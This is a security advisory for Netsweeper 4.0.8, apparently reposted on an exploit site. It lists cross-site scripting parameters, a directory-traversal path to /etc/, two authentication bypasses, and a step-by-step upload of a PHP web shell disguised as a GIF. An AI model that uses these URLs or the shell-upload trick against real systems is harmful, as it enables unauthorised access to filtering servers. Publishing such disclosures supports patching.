Netsweeper 4.0.8 - Multiple Vulnerabilities

+---------------------------------------------------+
+ Netsweeper 4.0.8 - Cross Site Scripting Injection +
+---------------------------------------------------+

Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com/
Version 	: 4.0.8 (and probably other versions)
Discovered by  	: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched      	: Yes
CVE		: CVE-2014-9606, CVE-2014-9609, CVE-2014-9610

+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.

+----------------------+
+ Exploitation Details +
+----------------------+
Five parameters were identified being vulnerable to XSS injection attacks, details are provided below:
	i)	https://netsweeper/remotereporter/load_logfiles.php?server=[XSS]&url=www.secuid0.net 
	ii)	https://netsweeper/webadmin/policy/category_table_ajax.php?customctid=[XSS]
	iii)	https://netsweeper/webadmin/alert/alert.php?urllist=[XSS]&comment= 
	iv)	https://netsweeper/webadmin/ajaxfilemanager/ajax_get_file_listing.php?[XSS] 
	v)	https://netsweeper/webadmin/policy/policy_table_ajax.php/[XSS] 

+---------------------------------------+
+ Netsweeper 4.0.8 - Directory Browsing +
+---------------------------------------+

URL Path: https://netsweeper/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/

+-----------------------------------------------------------------------+
+ Netsweeper 4.0.8 - Authentication Bypass (Disabling of IP Quarantine) +
+-----------------------------------------------------------------------+

An unauthenticated user is able to remove from quarantine any IP address on Netsweeeper 4.0.8 (and probably other versions).
URL Path: http://netsweeper/webadmin/user/quarantine_disable.php?ip=127.0.0.1

+-----------------------------------------------------------------+
+ Netsweeper 4.0.8 - Authentication Bypass (New Profile Creation) +
+-----------------------------------------------------------------+

Netsweeper's 4.0.8 (and probably other versions) Client Filter Admin portal can be reached at http://netsweeper/webadmin/clientlogin/ and a username/password combination is required to Add a Profile, by setting the "action" parameter to "showdeny" it will force the admin interface to load and subsequently allow any non-authenticated user to create a new profile.

URL Path: http://netsweeper/webadmin/clientlogin/?srid=&action=showdeny&url=

+--------------------------------------------------------+
+ Netsweeper 4.0.8 - Arbitrary File Upload and Execution +
+--------------------------------------------------------+

Netsweeeper 4.0.8 (and probably other versions) allows an authenticated user with admin privileges on the Cloud Manager web console, to upload arbitrary PHP code (eg PHP shell) and further execute it.

To replicate the bug, pipe the following request while being authenticated using admin privileges: http://netsweeper/webadmin/ajaxfilemanager/ajaxfilemanager.php

From the response page you can upload any GIF-lookalike php shell (remember to use basic evasion technique for file to upload successfully, hint: filename="secuid0.php.gif" with gif like header and php shell following)

Then, access your shell from: https://netsweeper/webadmin/deny/images/secuid0.php.gif and profit.

+----------+
+ Solution +
+----------+
Upgrade to latest version.

#  0day.today [2018-01-05]  #